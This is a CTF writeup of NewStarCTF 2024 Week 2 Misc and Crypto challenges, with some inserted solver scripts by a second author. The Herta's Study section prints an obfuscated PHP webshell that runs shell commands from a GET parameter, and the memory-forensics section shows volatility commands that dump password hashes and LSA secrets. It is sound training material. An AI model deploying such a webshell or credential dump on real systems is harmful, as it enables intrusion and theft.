NewStarCtf 2024 Week 2 Writeup-1 (Misc+Crypto)
This is still a partial writeup; use the navigation to jump to the parts you want. The missing parts may get added later once I have solved them, Orz
I only looked at the Week 2 challenges after submissions had already closed, so while working on them I did come across other people's writeups (
The "-1" in the title is because my heading format broke while I was writing and I don't know how to fix it on cnblogs, so the other Week 2 challenges go into "-2". Not that I can solve many of the other categories anyway (
Misc
wireshark_checkin
The challenge is HTTP traffic: open it in Wireshark and filter on http.
There is a request to the server for flag.txt; look at the response to get the flag.
flag{ez_traffic_analyze_isn't_it}
wireshark_secret
Nice, time to look at lewd pictures; this one is HTTP traffic as well.
A secret image was requested; look at that part of the response message to get the flag.
flag{you_are_gooddddd}
Helpful Classmate Xiaoming
I hadn't touched memory forensics before, so this was learn-as-you-go.
Installed volatility and the mimikatz plugin in Kali.
First, use imageinfo to identify the system profile: vol.py -f image.raw imageinfo
Then dump the password hashes:
vol.py -f image.raw --profile=Win7SP1x86 hashdump
Took the hash to an MD5 lookup site (https://www.somd5.com/), but it didn't crack.
Searching further, people said the mimikatz plugin can recover it, but running it produced nothing either.
Searched again and found that lsadump can retrieve the password (vol.py -f image.raw --profile=Win7SP1x86 lsadump), which gave the following:
This didn't seem to follow any logic either; I also tried looking at the processes, and with no ideas left I read another writeup and found that the flag is the part in the red box in the image above.
flag{ZDFyVDlfdTNlUl9wNHNTdzByRF9IQUNLRVIh}
Witnessing Volt Typhoon with a Backtracking Instrument
The browser extension Wayback Machine needs a VPN, sad.
So I searched the keywords Threatmon and Volt Typhoon and found a clearer version of the image (
The text in the box is: powerj7kmpzkdhjg4szvcxxgktgk36ezpjxvtosylrpey7svpmrjyuyd.onion
text ---- 16-character lowercase MD5 --> 6c3ea51b6f9d4f5e
flag{6c3ea51b6f9d4f5e}
Do You Play Genshin Too?
It's a GIF; open it in StegSolve, choose Frame Browser under Analyse, and extract the frames.
I first thought it was Hilichurlian, found a Teyvat script lookup table and translated the text in the middle, but that didn't seem useful, so I translated the text in the four corners instead.
That gave this string: asentence iiaaelgtsfkfa doyouknowfence mesioaabgnhnsgogmyeiade
fence: guessed a rail fence cipher (honestly, I saw another writeup while searching for the first half
Brute-forced the latter segment and got: maybegenshinisagoodgame
flag{maybegenshinisagoodgame}
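Added example (my own code, not from the original writeup): a zigzag rail fence decoder that reverses the cipher used above for any rail count, so the corner strings can be brute-forced in a loop rather than by hand. Checked against the two corner strings from the writeup: 3 rails turn mesioaabgnhnsgogmyeiade into maybegenshinisagoodgame, and 2 rails turn iiaaelgtsfkfa into itisafakeflag.

```python
# Added example: zigzag ("W"-pattern) rail fence decoder, not part of the writeup.


def rail_pattern(n: int, rails: int) -> list:
    """Rail index of each plaintext position when written in a zigzag."""
    pattern = []
    rail, step = 0, 1
    for _ in range(n):
        pattern.append(rail)
        if rail == 0:
            step = 1
        elif rail == rails - 1:
            step = -1
        rail += step
    return pattern


def rail_fence_decrypt(ciphertext: str, rails: int) -> str:
    """Undo a zigzag rail fence: ciphertext is rail 0's letters, then rail 1's, and so on."""
    n = len(ciphertext)
    if rails < 2 or rails >= n:
        return ciphertext  # degenerate fence, nothing is permuted
    pattern = rail_pattern(n, rails)
    out = [""] * n
    pos = 0
    for r in range(rails):
        for i in range(n):
            if pattern[i] == r:
                out[i] = ciphertext[pos]
                pos += 1
    return "".join(out)


def rail_fence_candidates(ciphertext: str) -> dict:
    """Every possible rail count, for picking the reading that makes sense."""
    return {r: rail_fence_decrypt(ciphertext, r) for r in range(2, len(ciphertext))}


if __name__ == "__main__":
    # Both corner strings from the writeup
    for ct in ("iiaaelgtsfkfa", "mesioaabgnhnsgogmyeiade"):
        for rails, pt in rail_fence_candidates(ct).items():
            print(rails, pt)
```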
The Secret Between the Lines
Wow, I would never have guessed this. At first I thought key.txt was just some random file; I even renamed flag.docx to flag.zip and unzipped it, which gave me two files, encryptpackage and encryptinfo.
Searching on Baidu suggested this is Microsoft's built-in encryption, which I didn't understand either.
Read another writeup: key.txt uses zero-width character encoding.
Ran it through a tool; the key is: it_is_k3y
Then unlock the doc file to get the flag.
The funny thing is that I always keep the software in eye-protection mode, so I saw it as soon as I opened the file (x
flag{you_h4ve_4nyth1n9}
Herta's Study
Looking at the traffic, it seems to be a file upload (?): a script was uploaded and then used to talk to the server. The script content is as follows:

```php
<?php

// Uploaded webshell as captured: runs the GET parameter through the shell and
// obfuscates the output with a function built from base64/rot13 fragments.
$payload=$_GET['payload'];
$payload=shell_exec($payload);
$bbb=create_function(
base64_decode('J'.str_rot13('T').'5z'),
base64_decode('JG5zPWJhc2U2NF9lbmNvZGUoJG5zKTsNCmZvcigkaT0wOyRpPHN0cmxlbigkbnMpOyRpKz0xKXsNCiAgICBpZigkaSUy'.str_rot13('CG0kXKfAPvNtVPNtVPNtWT5mJlEcKG1m').'dHJfcm90MTMoJG5zWyRpXSk7DQogICAgfQ0KfQ0KcmV0dXJuICRuczs=='));
echo $bbb($payload);

?>
```
The str_rot13() function applies ROT13 encoding to a string.
ROT13 shifts each letter 13 positions forward in the alphabet; digits and non-letter characters are left unchanged.
"." is PHP's string concatenation operator, so the uploaded PHP code is actually:
(vscode kept reporting an error when I used create_function; I looked it up and it seems to have been deprecated, and after changing it the error went away)
```php
<?php
$payload = $_GET['payload'];
$payload = shell_exec($payload);
// base64 the output, then ROT13 every character at an odd index
$bbb = function ($ns) {
    $ns = base64_encode($ns);
    for ($i = 0; $i < strlen($ns); $i++) {
        if ($i % 2 == 1) {
            $ns[$i] = str_rot13($ns[$i]);
        }
    }
    return $ns;
};
echo $bbb($payload);
?>
```
From the code, the result is base64-encoded and then the characters at odd positions are encoded with str_rot13.
Then find the packet requesting the flag and decode it, but it turned out to be a fake flag.
Later I found f.txt and decoded the flag: flag{sH3_i4_S0_6eAut1fuL.}
```php
<?php
$result='ZzxuZ3tmSQNsaGRsUmBsNzVOdKQkZaVZLa0tCt==';
// ROT13 is its own inverse, so re-applying it to the odd positions restores the base64
$bbb=function ($ns) {
    for ($i = 0; $i < strlen($ns); $i++) {
        if ($i % 2 == 1) {
            $ns[$i] = str_rot13($ns[$i]);
        }
    }
    return $ns;
};
echo base64_decode($bbb($result));
?>
```
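Added example (not from the writeup): a Python decoder for the response encoding that the shell applies (base64, then ROT13 on the characters at odd indices), for decoding the captured response bodies in bulk while working through the pcap. Because ROT13 is an involution, the same transform both encodes and decodes; the encoder is included only to round-trip constructed data. The first sample body is the string quoted in the writeup, the second is constructed here.

```python
# Added example: decoder for the webshell's response encoding, not part of the writeup.
import base64
import codecs


def rot13_odd_positions(s: str) -> str:
    """ROT13 only the characters at odd indices; digits, '+', '/' and '=' are untouched."""
    return "".join(codecs.encode(ch, "rot_13") if i % 2 else ch for i, ch in enumerate(s))


def encode_like_shell(data: bytes) -> str:
    """What the uploaded shell does to command output before echoing it."""
    return rot13_odd_positions(base64.b64encode(data).decode("ascii"))


def decode_shell_response(body: str) -> bytes:
    """Undo it: ROT13 twice is the identity, so the same pass restores valid base64."""
    return base64.b64decode(rot13_odd_positions(body.strip()))


# Constructed list of response bodies as they would be pulled out of the capture:
# the first is the string quoted in the writeup, the second is made up here.
SAMPLE_BODIES = [
    "ZzxuZ3tmSQNsaGRsUmBsNzVOdKQkZaVZLa0tCt==",
    encode_like_shell(b"constructed sample output\n"),
]


def decode_all(bodies) -> list:
    """Decode every captured response body."""
    return [decode_shell_response(b) for b in bodies]


if __name__ == "__main__":
    for raw, decoded in zip(SAMPLE_BODIES, decode_all(SAMPLE_BODIES)):
        print(raw, "->", decoded)
```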
Crypto
What Power Is This? Confused!
It's a Python script, as follows:
```python
from Crypto.Util.number import *

flag = b'flag{*****}'
p = getPrime(512)
q = getPrime(512)
n = p*q
e = 65537

m = bytes_to_long(flag)
c = pow(m, e, n)

hint = p^e + 10086

print("c =", c)
print("[n, e] =", [n, e])
print("hint =", hint)
'''
c = 36513006092776816463005807690891878445084897511693065366878424579653926750135820835708001956534802873403195178517427725389634058598049226914694122804888321427912070308432512908833529417531492965615348806470164107231108504308584954154513331333004804817854315094324454847081460199485733298227480134551273155762
[n, e] = [124455847177872829086850368685666872009698526875425204001499218854100257535484730033567552600005229013042351828575037023159889870271253559515001300645102569745482135768148755333759957370341658601268473878114399708702841974488367343570414404038862892863275173656133199924484523427712604601606674219929087411261, 65537]
hint = 12578819356802034679792891975754306960297043516674290901441811200649679289740456805726985390445432800908006773857670255951581884098015799603908242531673390
'''
```
Analysing the code above:
getPrime(512): take two 512-bit primes;
c=pow(m,e,n): c = m^e mod n. This is the RSA encryption that produces the ciphertext, so the plaintext is m = c^d mod n with the private key d, i.e.:
m=pow(c,d,n)
We know c, n and e; what we need is d.
In RSA, e and d are related by e*d ≡ 1 (mod φ), where φ = (p-1)*(q-1).
Use this site to factor n into p and q: http://www.factordb.com/index.php
With p and q, φ can be computed.
Now the gmpy2 library comes in!
```python
from Crypto.Util.number import *
import gmpy2

c = 36513006092776816463005807690891878445084897511693065366878424579653926750135820835708001956534802873403195178517427725389634058598049226914694122804888321427912070308432512908833529417531492965615348806470164107231108504308584954154513331333004804817854315094324454847081460199485733298227480134551273155762
n = 124455847177872829086850368685666872009698526875425204001499218854100257535484730033567552600005229013042351828575037023159889870271253559515001300645102569745482135768148755333759957370341658601268473878114399708702841974488367343570414404038862892863275173656133199924484523427712604601606674219929087411261
hint = 12578819356802034679792891975754306960297043516674290901441811200649679289740456805726985390445432800908006773857670255951581884098015799603908242531663304
e = 65537
# p and q from factordb
q=9894080171409167477731048775117450997716595135307245061889351408996079284609420327696692120762586015707305237750670080746600707139163744385937564246995541
p=12578819356802034679792891975754306960297043516674290901441811200649679289740456805726985390445432800908006773857670255951581884098015799603908242531598921
kk=(p-1)*(q-1)
# kk=124455847177872829086850368685666872009698526875425204001499218854100257535484730033567552600005229013042351828575037023159889870271253559515001300645102547272582607556946597809819206498583700587629821896578436377540232328729792993693280980361351684844458558344121591584147825245121367422062684374122308816800

# invert(e,n) returns d such that e * d == 1 mod n; if no such d exists it returns 0
d = gmpy2.invert(e,kk)
# d= 22611589977370520102188494132173206662182894540575368174403027280708176548743712414509190973164201319228760596652928358557224295975095230681067496021808078343144195007103821354677774261541360191905462400209949218721814339047952228144496950320622160175823856053884916779719061830624839737774087658005009858273
m=pow(c,d,n)
# m=264482712154170621062930777958510103708372984838245841047957012723716220867587500009954604988711976936661501831365621134205
flag=long_to_bytes(m)
print(flag)
```
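Added example (my own code, not the writeup's): a pure-Python solve that needs neither gmpy2 nor pycryptodome (Python 3.8+ has pow(e, -1, m) for modular inverses). It also shows what the challenge title is hinting at: in the source, hint = p^e + 10086 is Python, where ^ is XOR rather than exponentiation, and + binds tighter than ^, so hint is p XOR (e + 10086); XOR-ing with the same value again recovers p without factordb. The p and q that the writeup got from factordb are kept only as a cross-check.

```python
# Added example: pure-Python solve (Python 3.8+), not part of the writeup.
# C, N, E and HINT are the challenge output quoted above; P_FACTORDB and
# Q_FACTORDB are the factors the writeup obtained from factordb (cross-check only).
C = 36513006092776816463005807690891878445084897511693065366878424579653926750135820835708001956534802873403195178517427725389634058598049226914694122804888321427912070308432512908833529417531492965615348806470164107231108504308584954154513331333004804817854315094324454847081460199485733298227480134551273155762
N = 124455847177872829086850368685666872009698526875425204001499218854100257535484730033567552600005229013042351828575037023159889870271253559515001300645102569745482135768148755333759957370341658601268473878114399708702841974488367343570414404038862892863275173656133199924484523427712604601606674219929087411261
E = 65537
HINT = 12578819356802034679792891975754306960297043516674290901441811200649679289740456805726985390445432800908006773857670255951581884098015799603908242531673390
P_FACTORDB = 12578819356802034679792891975754306960297043516674290901441811200649679289740456805726985390445432800908006773857670255951581884098015799603908242531598921
Q_FACTORDB = 9894080171409167477731048775117450997716595135307245061889351408996079284609420327696692120762586015707305237750670080746600707139163744385937564246995541


def recover_p_from_hint(hint: int, e: int = E) -> int:
    # The challenge computes `hint = p^e + 10086`. In Python `^` is XOR and `+`
    # binds tighter than `^`, so this is p ^ (e + 10086). XOR-ing again undoes it.
    return hint ^ (e + 10086)


def rsa_decrypt(c: int, n: int, e: int, p: int, q: int) -> bytes:
    """Textbook RSA decryption once the factors are known."""
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)  # modular inverse, no gmpy2 needed
    m = pow(c, d, n)
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def solve(c: int = C, n: int = N, e: int = E, hint: int = HINT) -> bytes:
    p = recover_p_from_hint(hint, e)
    if n % p != 0:
        raise ValueError("hint did not yield a factor of n")
    q = n // p
    return rsa_decrypt(c, n, e, p, q)


if __name__ == "__main__":
    print(solve())
```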
Since you konw something
The challenge code is as follows:
```python
from pwn import xor
#The Python pwntools library has a convenient xor() function that can XOR together data of different types and lengths
from Crypto.Util.number import bytes_to_long

key = ?? #extremely short
FLAG = 'flag{????????}'
c = bytes_to_long(xor(FLAG,key))

print("c={}".format(c))

'''
c=218950457292639210021937048771508243745941011391746420225459726647571
'''
```
XOR again.
c is known and the challenge says the key is very short; find the flag.
The flag format is flag{xxx}, and the key is short, so can the key be derived from "flag{"?
XOR is bitwise, so taking flag{ I should XOR it against the first five bytes of c0, which are: \x08\x1f\x0f\x14\x15
But the result was wrong, so I dropped the { and derived the key from that; with the key, XOR again to get the flag: flag{Y0u_kn0w_th3_X0r_b3tt3r}
```python
from pwn import xor
from Crypto.Util.number import bytes_to_long,long_to_bytes

c=218950457292639210021937048771508243745941011391746420225459726647571
c0=long_to_bytes(c)
c1=c0[:4]
flag=b'flag'
key=xor(c1,flag)      # known plaintext "flag" exposes the key bytes
flag = xor(c0,key)    # xor() repeats the short key over the whole ciphertext
print(flag)
```
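Added example (my own code, not the writeup's): a pure-Python version of the known-plaintext attack on a repeating XOR key, without pwntools. xor_cycle repeats the key the way pwntools' xor() does for arguments of different lengths, and candidates() derives a key from the first key_len bytes of the known prefix for every key length the prefix can pin down. From the bytes \x08\x1f\x0f\x14\x15 quoted above, the 4-byte key works out to "nsns", i.e. the real key is the 2-byte "ns"; guessing a 5-byte key from "flag{" gives "nsnsn", whose repetition has the wrong period from the sixth byte on, which is why that attempt failed.

```python
# Added example: known-plaintext recovery of a short repeating XOR key, pure Python.
# C is the challenge output quoted in the writeup.
C = 218950457292639210021937048771508243745941011391746420225459726647571


def int_to_bytes(x: int) -> bytes:
    # Same as Crypto.Util.number.long_to_bytes for positive x
    return x.to_bytes((x.bit_length() + 7) // 8, "big")


def xor_cycle(data: bytes, key: bytes) -> bytes:
    """XOR data with key repeated cyclically (pwntools' xor() behaves this way)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def key_from_prefix(ct: bytes, known_prefix: bytes, key_len: int) -> bytes:
    """A repeating key of length key_len is fully exposed by key_len known plaintext bytes."""
    if key_len > len(known_prefix):
        raise ValueError("known prefix is shorter than the assumed key length")
    return xor_cycle(ct[:key_len], known_prefix[:key_len])


def candidates(c: int, known_prefix: bytes = b"flag{") -> dict:
    """Return {key_len: (key, plaintext)} for every key length the prefix can pin down.

    A wrong key length still reproduces the prefix (it was used to derive the key),
    so the reader picks the length whose decryption reads as a flag all the way through.
    """
    ct = int_to_bytes(c)
    out = {}
    for key_len in range(1, len(known_prefix) + 1):
        key = key_from_prefix(ct, known_prefix, key_len)
        out[key_len] = (key, xor_cycle(ct, key))
    return out


if __name__ == "__main__":
    for key_len, (key, pt) in candidates(C).items():
        print(key_len, key, pt)
```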
茶里茶气 (Tea-flavoured; not solved)
Challenge code:
```python
from Crypto.Util.number import *

flag = "flag{*****}"
assert len( flag ) == 25

a = ""
for i in flag:
    a += hex(ord(i))[2:]
l = int(a,16).bit_length()
print("l =" , l )

v0 = int(a,16)>>(l//2)
v1 = int(a,16)-(v0<<(l//2))
p = getPrime(l//2+10)

v2 = 0
derta = 462861781278454071588539315363
v3 = 489552116384728571199414424951
v4 = 469728069391226765421086670817
v5 = 564098252372959621721124077407
v6 = 335640247620454039831329381071
assert v1 < p and v0 < p and derta < p and v3 < p and v4 < p and v5 < p and v6 < p

for i in range(32):
    v1 += (v0+v2) ^ ( 8*v0 + v3 ) ^ ( (v0>>7) + v4 ) ; v1 %= p
    v0 += (v1+v2) ^ ( 8*v1 + v5 ) ^ ( (v1>>7) + v6 ) ; v0 %= p
    v2 += derta ; v2 %= p

print( "p =" , p )
print( "v0 =" , v0 )
print( "v1 =" , v1 )

"""
l = 199
p = 446302455051275584229157195942211
v0 = 190997821330413928409069858571234
v1 = 137340509740671759939138452113480
"""
```
This looks a bit involved; let me organise what can be read from the code:
(1) the flag is 25 characters long;
(2) ord(i) takes each character's ASCII value, hex() gives it in hexadecimal, and [2:] presumably strips the 0x prefix, so a is a string of the flag's ASCII values in hex;
(3) int(a,16) converts the hex string a to an integer, and l is the bit length of that value, l=199;
(4) l//2=99; >> and << are bit shifts on the binary representation: << shifts left and pads zeros at the end, >> shifts right, which is like dividing by 2. So >>99 divides by 2^99: v0 = the integer of ASCII values divided by 2^99;
(5) v0 is padded with 99 zeros at the end, so v1 is the integer of ASCII values minus 2^100;
(6) p is a 109-bit prime, and all the vxx are < p.
(7) And then I got stuck, at v0 %= p.
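Added example (my own code; the writeup stops before this point): the cipher above is a TEA-style Feistel-like construction with arithmetic mod p, and every round is invertible. Each round only adds a value derived from the other half (and a known round constant) mod p, so decryption walks the 32 rounds backwards, undoing the three statements of each round in reverse order, starting from v2 = 32*derta mod p. Once v0 and v1 are recovered, the flag integer is (v0 << (l//2)) + v1, the exact inverse of the split in the source. All constants are the challenge output quoted in the code above; derta is spelled DELTA here.

```python
# Added example: inverse of the challenge's 32-round cipher, not part of the writeup.
# Constants are the values printed by / hard-coded in the challenge source.
P = 446302455051275584229157195942211
V0 = 190997821330413928409069858571234
V1 = 137340509740671759939138452113480
L = 199
DELTA = 462861781278454071588539315363  # `derta` in the challenge
V3 = 489552116384728571199414424951
V4 = 469728069391226765421086670817
V5 = 564098252372959621721124077407
V6 = 335640247620454039831329381071
ROUNDS = 32


def encrypt(v0: int, v1: int, p: int = P) -> tuple:
    """Same rounds as the challenge, for round-trip checking."""
    v2 = 0
    for _ in range(ROUNDS):
        v1 = (v1 + ((v0 + v2) ^ (8 * v0 + V3) ^ ((v0 >> 7) + V4))) % p
        v0 = (v0 + ((v1 + v2) ^ (8 * v1 + V5) ^ ((v1 >> 7) + V6))) % p
        v2 = (v2 + DELTA) % p
    return v0, v1


def decrypt(v0: int, v1: int, p: int = P) -> tuple:
    """Walk the rounds backwards; each forward statement is an addition mod p,
    so subtracting the same (recomputable) term mod p undoes it."""
    v2 = (ROUNDS * DELTA) % p  # value of v2 after the last forward round
    for _ in range(ROUNDS):
        v2 = (v2 - DELTA) % p  # v2 as it was during this round
        v0 = (v0 - ((v1 + v2) ^ (8 * v1 + V5) ^ ((v1 >> 7) + V6))) % p
        v1 = (v1 - ((v0 + v2) ^ (8 * v0 + V3) ^ ((v0 >> 7) + V4))) % p
    return v0, v1


def recover_flag(v0: int = V0, v1: int = V1, l: int = L) -> bytes:
    """Invert the split a = (v0 << (l//2)) + v1 and turn a back into the 25 ASCII bytes."""
    pv0, pv1 = decrypt(v0, v1)
    a = (pv0 << (l // 2)) + pv1
    return a.to_bytes((l + 7) // 8, "big")


if __name__ == "__main__":
    print(recover_flag())
```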
just one and more than two
As usual, the challenge code first:
```python
from Crypto.Util.number import *

flag = b'flag{?????}'
m1 = bytes_to_long(flag[:len(flag)//2])
m2 = bytes_to_long(flag[len(flag)//2:])
e = 65537
p, q, r= (getPrime(512) for _ in range(3))
N=p*q*r
c1 = pow(m1, e, p)
c2 = pow(m2, e, N)

print(f'p={p}\nq={q}\nr={r}\nc1={c1}\nc2={c2}')

'''
p=11867061353246233251584761575576071264056514705066766922825303434965272105673287382545586304271607224747442087588050625742380204503331976589883604074235133
q=11873178589368883675890917699819207736397010385081364225879431054112944129299850257938753554259645705535337054802699202512825107090843889676443867510412393
r=12897499208983423232868869100223973634537663127759671894357936868650239679942565058234189535395732577137079689110541612150759420022709417457551292448732371
c1=8705739659634329013157482960027934795454950884941966136315983526808527784650002967954059125075894300750418062742140200130188545338806355927273170470295451
c2=1004454248332792626131205259568148422136121342421144637194771487691844257449866491626726822289975189661332527496380578001514976911349965774838476334431923162269315555654716024616432373992288127966016197043606785386738961886826177232627159894038652924267065612922880048963182518107479487219900530746076603182269336917003411508524223257315597473638623530380492690984112891827897831400759409394315311767776323920195436460284244090970865474530727893555217020636612445
'''
```
From the challenge, the flag is the concatenation of two parts, and p, q, r are 512-bit primes. Since p, q, r are known, N can be computed too. And since c1=pow(m1,e,p) and c2=pow(m2,e,N), it feels like the private key d can be computed as well.
kk=(p-1)*(q-1)
d=gmpy2.invert(e,kk), from which m1 and m2 can be recovered.
I then got m1 and m2, but m2 wasn't a proper string; I tried changing N to p*q and got the flag.
I don't know why this change is needed; if any expert reads this, please do enlighten me _(:з」∠)_
```python
from Crypto.Util.number import *
import gmpy2
p=11867061353246233251584761575576071264056514705066766922825303434965272105673287382545586304271607224747442087588050625742380204503331976589883604074235133
q=11873178589368883675890917699819207736397010385081364225879431054112944129299850257938753554259645705535337054802699202512825107090843889676443867510412393
r=12897499208983423232868869100223973634537663127759671894357936868650239679942565058234189535395732577137079689110541612150759420022709417457551292448732371
c1=8705739659634329013157482960027934795454950884941966136315983526808527784650002967954059125075894300750418062742140200130188545338806355927273170470295451
c2=1004454248332792626131205259568148422136121342421144637194771487691844257449866491626726822289975189661332527496380578001514976911349965774838476334431923162269315555654716024616432373992288127966016197043606785386738961886826177232627159894038652924267065612922880048963182518107479487219900530746076603182269336917003411508524223257315597473638623530380492690984112891827897831400759409394315311767776323920195436460284244090970865474530727893555217020636612445
e = 65537
N=p*q

kk=(p-1)*(q-1)
d=gmpy2.invert(e,kk)

m1=long_to_bytes(pow(c1,d,p))
# flag{Y0u_re4lly_kn0w_Eule
m2=long_to_bytes(pow(c2,d,N))
# r_4nd_N3xt_Eu1er_is_Y0u!}
print(m1,'\n',m2)
```
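Added example (my own code, not the writeup's) that answers the question above. c2 is m2^e mod N with N = p*q*r, and since p*q divides N, reducing c2 mod p*q still gives m2^e mod p*q. A private exponent has to be the inverse of e modulo the φ of the modulus it is used with: with N = p*q*r, the writeup's kk = (p-1)*(q-1) is φ(p*q), not φ(N) = (p-1)*(q-1)*(r-1), so pow(c2, d, N) produces garbage; with N = p*q, kk and N match, and because m2 (25 bytes) is far smaller than p*q the result is exactly m2. Both correct routes are computed and compared, and the mismatched one is shown to fail. For c1 = m1^e mod p, Fermat's little theorem means d = e^-1 mod (p-1) is enough; the writeup's d also works there because (p-1) divides (p-1)*(q-1).

```python
# Added example: why decrypting mod p*q works, not part of the writeup.
# All constants are the challenge output quoted above.
P = 11867061353246233251584761575576071264056514705066766922825303434965272105673287382545586304271607224747442087588050625742380204503331976589883604074235133
Q = 11873178589368883675890917699819207736397010385081364225879431054112944129299850257938753554259645705535337054802699202512825107090843889676443867510412393
R = 12897499208983423232868869100223973634537663127759671894357936868650239679942565058234189535395732577137079689110541612150759420022709417457551292448732371
C1 = 8705739659634329013157482960027934795454950884941966136315983526808527784650002967954059125075894300750418062742140200130188545338806355927273170470295451
C2 = 1004454248332792626131205259568148422136121342421144637194771487691844257449866491626726822289975189661332527496380578001514976911349965774838476334431923162269315555654716024616432373992288127966016197043606785386738961886826177232627159894038652924267065612922880048963182518107479487219900530746076603182269336917003411508524223257315597473638623530380492690984112891827897831400759409394315311767776323920195436460284244090970865474530727893555217020636612445
E = 65537


def int_to_bytes(x: int) -> bytes:
    return x.to_bytes((x.bit_length() + 7) // 8, "big")


def decrypt_mod_prime(c: int, p: int, e: int = E) -> int:
    """c = m^e mod p with m < p: by Fermat, d = e^-1 mod (p-1) inverts it."""
    d = pow(e, -1, p - 1)
    return pow(c, d, p)


def decrypt_mod_composite(c: int, factors, e: int = E) -> int:
    """Multi-prime RSA: phi is the product of (f-1) over the factors of the modulus used."""
    n = 1
    phi = 1
    for f in factors:
        n *= f
        phi *= f - 1
    d = pow(e, -1, phi)
    return pow(c, d, n)


def mismatched_exponent(c: int = C2) -> int:
    """The writeup's first attempt: d from phi(p*q) but the modulus p*q*r."""
    d = pow(E, -1, (P - 1) * (Q - 1))
    return pow(c, d, P * Q * R)


def solve() -> bytes:
    m1 = decrypt_mod_prime(C1, P)
    # Route 1: the modulus as generated, N = p*q*r, with the matching phi(N)
    m2_full = decrypt_mod_composite(C2, [P, Q, R])
    # Route 2: only p*q. c2 mod (p*q) is still m2^e mod (p*q) because p*q | N,
    # and m2 < p*q, so the result is exact.
    m2_pq = decrypt_mod_composite(C2, [P, Q])
    if m2_full != m2_pq:
        raise ValueError("the two routes disagree")
    return int_to_bytes(m1) + int_to_bytes(m2_full)


if __name__ == "__main__":
    print(solve())
```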